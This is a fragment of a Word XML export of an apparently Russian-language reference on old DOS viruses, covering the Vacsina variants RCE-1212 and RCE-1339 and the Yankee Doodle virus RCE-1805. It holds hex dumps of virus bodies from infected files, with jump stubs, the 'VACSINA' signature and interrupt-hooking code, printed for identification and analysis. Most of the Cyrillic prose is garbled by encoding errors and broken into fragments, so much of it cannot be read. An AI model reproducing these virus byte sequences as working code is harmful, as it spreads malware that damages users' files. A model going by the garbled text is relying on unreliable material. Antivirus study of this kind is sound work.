        <w:t>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    Program   Parent   Sg   Bytes           Hooke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  ��������  ��  ������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11)  DOS       N/A        2    3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E8)  DOSEDIT   DOS        2    2016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F9)  DOSEDIT   DOS        2    2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B)  BETA      DOS        2    4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7B)  N/A       DOS        1    3808  03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6A)  N/A       DOS        1     928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A5)  N/A       DOS        1    1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F5)  N/A       DOS        1     912  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2F)  N/A       DOS        1     736  16  2F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5E)  N/A       DOS        1     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82)  N/A       DOS        1    3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51)  N/A       DOS        1    5280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7)  N/A       N/A        1   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.2. ����� RCE-1212 (Vacsina-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祭��� ��᪮�쪨� ������ ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ��᪨ ���������  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"VASCINA-05". ����� ����� ��⠢��� 1212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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨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ࠣ���� ����� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE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: E9 69 08 90 90 90 90 90  90 90 90 90 90 90 90 90   .i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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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  ��᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� ������� �।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饩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0: 4D 07 00 4B 00 00 00 00  00 00 00 00 00 00 00 00   M..K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D0: 5C 06 FD 18 56 05 9D 10  20 00 05 00 90 90 90 90   \...V...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E0: 90 90 90 90 05 56 41 43  53 49 4E 41 20 20 20 20   .....VACS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F0: 00 00 80 00 00 00 00 00  70 11 C3 90 02 40 C2 00   ........p....@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0: D0 09 00 00 00 00 00 00  00 20 20 20 20 20 20 20  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10: 20 20 20 20 20 20 20 20  20 20 20 20 20 E8 00 00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20: 5B 50 8C C0 05 10 00 8B  0E 0E 01 03 C8 89 4F FB   [P...........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30: 8B 0E 16 01 03 C8 89 4F  F7 8B 0E 10 01 89 4F F9   .......O.....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0: 8B 0E 14 01 89 4F F5 8B  3E 18 01 8B 16 08 01 B1   .....O..&gt;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50: 04 D3 E2 8B 0E 06 01 E3  17 26 C5 B5 00 01 83 C7   .........&amp;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60: 04 8C DD 26 03 2E 08 01  03 E8 8E DD 01 04 E2 E9   ...&amp;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70: 0E 1F BF 00 01 8B F2 81  C6 00 01 8B CB 2B CE F3   .............+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80: A4 58 FA 8E 57 FB 8B 67  F9 FB FF 6F F5 B0 03 CF   .X..W..g...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90: 9C 3D 00 4B 74 06 9D 2E  FF 2E 00 00 06 1E 55 57   .=.Kt.........UW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05A0: 56 52 51 53 50 8B EC B8  24 35 CD 21 2E 8C 06 06   VRQSP...$5.!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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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70: 2E 89 47 FB B8 00 00 8E  C0 26 A1 C5 00 3D 7F 39   ..G......&amp;...=.9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0: 75 08 26 A0 C7 00 3C 04  73 32 8B D4 2B D3 81 EA   u.&amp;...&lt;.s2..+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0: 78 0B 72 28 BA CB 04 B1  04 D3 EA 2E 89 97 54 FC   x.r(.........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A0: 8C D9 03 D1 8E C2 8B F3  81 C6 51 FC 8B FE B9 BC   ..........Q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B0: 04 FC F3 A4 06 E8 03 00  EB 13 90 CB 8C C8 8E D8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C0: 8E C0 8E D0 2E 8B 47 FB  2E FF A7 07 01 BE 00 00   ......G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D0: BF 00 00 8B CB 81 C1 61  FC 8C C2 4A 8E C2 8C DA   .......a...J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E0: 4A 8E DA 03 F1 4E 8B FE  FD F3 A4 FC 2E 8B 97 54   J....N.........T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>08F0: FC 26 29 16 03 00 26 83  2E 03 00 01 26 8C 0E 01   .&amp;)...&amp;.....&amp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0: 00 BF 00 00 8B F3 81 C6  51 FC B9 BC 04 1E 07 0E   ........Q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0: 1F F3 A4 26 83 2E 03 00  01 53 8C CB B4 50 CD 21   ...&amp;.....S...P.!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0920: 5B 2E 8C 0E 36 00 2E 8B  16 2C 00 4A 8E C2 26 8C   [...6....,.J..&amp;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30: 0E 01 00 B8 21 35 53 CD  21 36 8C 06 02 00 36 89   ....!5S.!6...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40: 1E 00 00 5B B8 21 25 8C  D2 8E DA BA C0 00 CD 21   ...[.!%.....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>0950: B8 00 00 8E C0 26 C7 06  C5 00 7F 39 26 C6 06 C7   .....&amp;.....9&amp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60: 00 04 8C C8 8E D8 B4 1A  BA 50 00 CD 21 2E 8B 47   .........P..!..G</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0970: FB E9 48 FF C0 04 03 01 �F4 7A 04�00               ..H......z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.3. ����� RCE-1339 (Vacsina-B, Vacsina-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⮣� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1339 (53Bh) �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM � 1483 -  EXE-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�� � �� ��� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬠ�ਢ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-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ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠤��.  ��᫥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠤�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� 㤫������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ����⢨�, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ࠧ�������� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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M-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1339 (53Bh) �� 62601  (F489h)  ����  �  EXE-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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FDB3h ���� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� �� � ������ ��� �믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(21-4B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 �����  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 ������ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-1206 (VASCINA-05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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  ���  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨬ���  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">��  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 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CSINA-05" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ���� ���� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>E9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ࠣ���� ����� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-13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: E9 4D 09 90 90 90 90 90  90 90 90 90 90 90 90 90   .M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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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  ��᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� ������� �।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饩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0: 4D 08 00 53 00 00 00 00  00 00 00 00 00 00 00 00   M..S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50: 5C 06 FD 18 56 05 9D 10  20 00 05 00 AE 00 21 00   \...V... .....!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60: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 00 56   ...............V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0570: 41 43 53 49 4E 41 20 20  20 20 00 00 80 00 00 00   ACSINA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80: 00 00 9C 11 FB 75 01 40  C2 00 46 0A 00 00 00 00   .....u.@..F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90: 00 00 00 20 20 20 20 20  20 20 20 20 20 20 20 20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A0: 20 20 20 20 20 20 20 E8  00 00 5B 50 8C C0 05 10          ...[P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B0: 00 8B 0E 0E 01 03 C8 89  4F FB 8B 0E 16 01 03 C8   ........O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C0: 89 4F F7 8B 0E 10 01 89  4F F9 8B 0E 14 01 89 4F   .O......O......O</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05D0: F5 8B 3E 18 01 8B 16 08  01 B1 04 D3 E2 8B 0E 06   ..&gt;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E0: 01 E3 17 26 C5 B5 00 01  83 C7 04 8C DD 26 03 2E   ...&amp;.........&amp;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F0: 08 01 03 E8 8E DD 01 04  E2 E9 0E 1F BF 00 01 8B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0: F2 81 C6 00 01 8B CB 2B  CE F3 A4 58 FA 8E 57 FB   .......+...X.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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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00: 3B 05 1E 07 0E 1F F3 A4  26 83 2E 03 00 01 53 8C   ;.......&amp;....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10: CB B4 50 CD 21 5B 2E 8C  0E 36 00 2E 8B 16 2C 00   ..P.![...6....,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20: 83 FA 00 75 05 B8 07 0E  CD 10 4A 8E C2 26 8C 0E   ...u......J..&amp;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30: 01 00 B8 21 35 53 CD 21  36 8C 06 02 00 36 89 1E   ...!5S.!6....6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40: 00 00 5B B8 21 25 8C D2  8E DA BA CA 00 CD 21 B8   ..[.!%........!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50: 00 00 8E C0 26 C7 06 C5  00 7F 39 26 C6 06 C7 00   ....&amp;.....9&amp;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60: 10 8C C8 8E D8 B4 1A BA  50 00 CD 21 2E 8B 47 FB   ........P..!.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70: E9 2D FF 40 05 03 01�F4  7A 10�E9                  .-.@....z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2. �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ��몠�쭮� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠬��, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騥 � ������ ��㯯� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠪ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠧� ��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ࠦ�����  ��� ��⥬� ����⪠ ��१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS � 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樨 ����⨩ ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CTRL-ALT-DEL ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� � ��砫� ���砭��  ������� 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業���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>").  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">ਬ�୮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ��⥬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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2.1. ����� R�E-1805 (�P19, Yankey Doodle - ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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몠�쭠�  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪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R�E-1805 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������  ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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䠩�� ⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந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᪥ �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ������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COMMAND.COM. ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠡ��ᯮᮡ�� �� �� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS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஢�ઠ �����  ���ᨨ � ⥫� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>09, 21. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1805-1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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ����� � ��ਡ��� ������� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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믮������ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ⥫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, ��⠢��� � ���� �� ���� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��砫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᪥  ��ࠦ�����  �ணࠬ��  ����� ����� ᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �᫨ 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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">09 � 21. � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥ �� �ணࠬ�� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �ணࠬ�� ��ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �᫨ ���,  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ணࠬ�� �� ��᪥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� �⮬ ����� ������� ���� 14 ���⮢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ࠦ����� �ணࠬ�� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� � ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥���� ⥫�.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�� ��ࠦ������ �ணࠬ�� �᭮���� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� ��᫥���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>8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  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨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�ந��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� ������� �� ����⨨ ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CTRL-ALT-DEL, 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ᮤ�ন�  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易����  � ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">襭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ���⮬� ⠪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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ࠦ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RC-1701,  RCE-1805 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦠���� 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饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥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⭠� ����  ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨������ ��⥬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬮ�� ᯨ᪠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 xml:space="preserve">ணࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� �⨫�� MAP,  SMAP,  MMAP � �.�.).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������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ������ 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த�⥫� � ������ ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1792 ����.  �� �⮬ � ��� "Hooked  vec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㪠���� �� ������ ���墠祭���� ���뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 �� ��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⢨⥫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 xml:space="preserve">頥���  �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥���,  � 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INT, �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢��� ��室 ���⥩�� 䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢ ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VIRB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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥� � ����� � � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 �.  �����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᫥������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६���� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.�.���⭮�, ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�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ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 ��� �⮣� ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 �. ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠣�� ��⨢ ������� ����� �뫠 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>V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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ �������� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� ��䥪⨢�� ��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騥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ��䥪⨢�� ��⨢ ��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 ��⭮��, ����⪨ ����� ����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �� �����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VIRBLK,  �� ANTI4US2.  ������ ANTI4US2 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ���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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21.  ����� ⠪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� �ਬ�⨢�� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ �����  ��⨢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ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Advanced  Disk  Manager ����� �� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
